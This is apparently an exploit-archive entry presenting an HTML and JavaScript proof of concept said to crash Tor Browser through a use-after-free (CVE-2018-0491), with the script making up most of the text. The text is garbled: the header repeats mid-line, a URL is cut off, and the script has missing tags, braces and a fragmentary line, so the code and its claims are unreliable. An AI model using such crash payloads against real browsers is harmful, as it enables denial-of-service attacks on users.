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# Exploit Title: Tor Browser - Use After Free Vulnerability
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: * <https://www.torprojec # Exploit Title: Tor Browser - Use After Free Vulnerability
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: * <>*
# Software Link:
# Version: Tor 0.3.2.x before
# Tested on: Kali Linux
# CVE : CVE-2018-0491

#Run exploit, result DOS
<!DOCTYPE html>
<title>veryhandsome jameel naboo</title>
function send()
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}